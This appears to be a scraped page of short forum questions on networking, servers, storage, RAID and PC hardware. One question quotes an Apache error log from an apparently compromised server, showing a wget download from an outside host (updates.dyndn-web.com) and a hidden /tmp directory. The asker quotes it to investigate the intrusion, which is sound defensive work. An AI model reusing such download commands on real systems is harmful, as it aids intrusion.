  • Network Switch fast eneogh for Dlink DIR-655

    - by Recursion
I am setting up a server and want to keep it outside of my local network which is inside of the Dlink 655 router. I originally bought the dlink router mainly because it is fast, much faster than any other consumer router I have tried. The only router which is capable of real 10MB/s d download speed. I need a switch which will not cause a bottle neck to the router. The switch will connect the to the server and the dlink router.

  • how to check if your isp does video throttling?

    - by bbaja42
I've recently changed isp; and noticed that I no longer can watch video sites like youtube in real time; I need to wait for buffering first. In both ISPs, my speed was same 5 megabits per second. I've checked normal download of files, and torrents, and they all work fine. Also, checked other video sites, same problem. Used other pc, same problem

  • Why is my server using so much memory?

    - by Qasim
I haven't even set up my website on my dedicated server so I'm the only one using it at the moment. And yet this is what I see in my sys info: Full Size I just got a bunch of security softwares installed today so I'm wondering if that could be the reason. Programs like Dos deflate, CSF firewall, Mod_security, SIM, Log watch, etc. My server's details: CentOS Processor Intel Xeon CPU X3220 CPU Speed 2.39 GHz Cache Size 4.00 MB RAM 2GB DDR2

  • Apache error log interpretation

    - by HTF
It looks like someone gained access to my server. How I can find out which Apache vHosts this log is related to? How these commands from the log are invoked and how/why they are printed to the log file - is this some remote shell or PHP script? /var/log/httpd/error_log mkdir: cannot create directory `/tmp/.kdso': File exists --2014-06-13 13:29:17-- http://updates.dyndn-web.com/abc.txt Resolving updates.dyndn-web.com... 94.23.49.91 Connecting to updates.dyndn-web.com|94.23.49.91|:80... connected. • slow interactive response time

    - by ndhert
VMWare ESXi4 with 2 VM's (FreeBSD-amd64). When doing a reboot on one of the VM's, the reboot is done in normal speed, but after that, the interactive response time on the other gets very slow: pressing return at the command prompt, takes serveral seconds to be exectuted. SSH-ing to the VM machine takes a long time before you are logged in. Only after 20 minutes or so, the situation is normalized. What's the reason and how to remedy?

  • Expendable, Redundant, Easily recoverable

    - by MeIr
I am desperate at this point, I have been looking for "Big storage" solution for a while on my own and I can't find anything that would suite my needs. But now push came to shove. Current situation: I have about 6TB data storage (already full) - Drobo. Yesterday Drobo died on me and it put me into bad situation - I can't recover my data without buying another Drobo. From extensive research online I realized that Drobo is not the safest bet and by now it seems very poor choice. I ordered new Drobo to try to get my data back, however I don't want to be in the same situation later and continuing using Drobo promises this event to re-occur. What I am looking for: 1) Inexpensive setup. 2) Dynamically extendable - add more drives and/or replace a drive with bigger capacity. 3) Redundant - setup against 1-3 drive failure, will depend on total number of drives. For the sake of argument let's assume for every 4 drives one should be able to fail without data loss. 4) Easy data recovery - let's say unforeseen happens, I would like to be able to recover information without buying new tools or replacements - example: new Drobo. 5) Should be USB or Network Attach Storage 6) No demand on speed. Doesn't have to be fast, I am not doing video editing on the setup. However if option exists, would be nice to have a decent speed. After thoughts: I reviewed few options and FreeNAS looks nice, but it doesn't have #2 - Dynamic extendability. There are work around with Pools but it seems a bit complicated and unnecessary. More over it seems like data safety is a big question - saw some horror stories. Please advise on what options I have and what seems like an optimal solution (if any). I don't care if it has to be Windows or Linux box or any other OS and/or software that has to run on top, but simple solution is more attractive. Thank you! P.S: Feel free to ignore "After thoughts".

  • What's wrong with this iptable rule?

    - by warl0ck
I run dnsmasq locally as a cache server, in the old days, I allow all INPUT packets from lo+, and set policy of INPUT to DROP: -A INPUT -i lo+ -j ACCEPT Now I decide to put this on the raw table to speed up rules matching, -A PREROUTING -i lo+ -j ACCEPT But that doesn't work as expected. Why? Since the packets get processed by the raw table first, then nat, then filter, why isn't that rule work the same as the old one?

  • Use a RAID Controller without drivers?

    - by cian1500ww
Ordered an Adaptec 1420SA RAID card for my Debian Squeeze media server but didn't check to see if it was compatible, turns out it's not because it uses something called hostRAID which requires special drivers that aren't available for Debian. Could I still use the card as an ordinary controller and just use OS software RAID?? I'm not looking for speed, just need to mirror some drives that will be used for storage, the OS will reside on a disk connected to the server's onboard controller so the system won't be booting from any drives on the Adaptec controller.

  • Recommended USB 3.0 PCI/PCIX adapter for older Dell

    - by user32996
Can anyone recommend a USB 3.0 adapter for my older Dell server? It does not have PCI express (PCIe) so I was looking for PCI or PCIX. I have been burned in the past installing "desktop" class drives on servers (i.e. blue screens under heavy load) so I would rather pay more to get something reliable. We are hoping to get better speed on our backups to an external drive, even 10% improvement would be worth it.

  • Swap slower pentium 4 with faster pentium 4

    - by mike
Is it possible to do a straight swap of a 2.8 Ghz Pentium 4 with a 3.4 Ghz Pentium 4 on an Intel motherboard? Do each of these chips have the same socket, or are they different? How do I find out what specific processor (besides the speed, of course) that I have in my computer? How do I find out what socket it uses? If I have to look up the motherboard model information, where do I get the motherboard model from?

  • Would it be better to have 10 GB PC5300 or 8 GB PC PC6400?

    - by jayrdub
My development machine is heavy on memory usage. It currently only has 4GB of PC5300. I'm going to buy 8 GB of RAM, but should I take out all my existing memory and install just PC6400 or leave some of the original and stick with 5300? I don't know if I'll ever need more than 8GB, I might, I'm just wondering if the speed difference between 5300 and 6400 is worth trashing the 2 or 3 GB of old RAM I would still have room for after adding the new RAM.

  • Periodic Slowdowns During Games

    - by Daniel
Hi, I am having trouble with my laptop. A problem that happens is a slowdown that occurs every 5 minutes or so (problem can be seen during games). The fan will start to speed up and the laptop will slow down to about 50% of its original fps. This will persist for about 30 seconds and then continue back. Here are my specs: Intel T3400 (2.16GHz, 2 cores, 1M cache) 3 GB RAM (PC2-5300 333MHz) Mobile Intel 4 Series Express (1.26 GB VRAM)

  • Clean install vs disk image

    - by Thanos
Once a year I am making a clean install on windows, in order to keep my system fast. After posting a question on making a bootable windows usb with exe programs where I was adviced to make a disk image, a new question rose. What is the difference in making a disk image and performing a clean install on windows? Which is better in terms of speed, general performance, value for time and transfering between different computers?

  • Benchmark virtual machines?

    - by evan
I'm looking for a good way to benchmark the performance of Ubuntu machines (preferably from the command line - only care about harddrive speed, memory, and cpu - not graphics). Are there any programs that could also be used on Mac or Windows so I could compare the results against an Apple or PC Desktop? Ultimately I'd like to use these benchmarks to compare different virtual machine configurations (speeds on different hosts and different hardware to get practical idea of the differences between different setups a rigs). Thanks!

  • Linux Terminal I/O via SPI Device

    - by crankshaft
Is it possible to create a console using the SPI device (/dev/spidev0.0) in a similar way that you would create a serial console, or if not is this possible ??
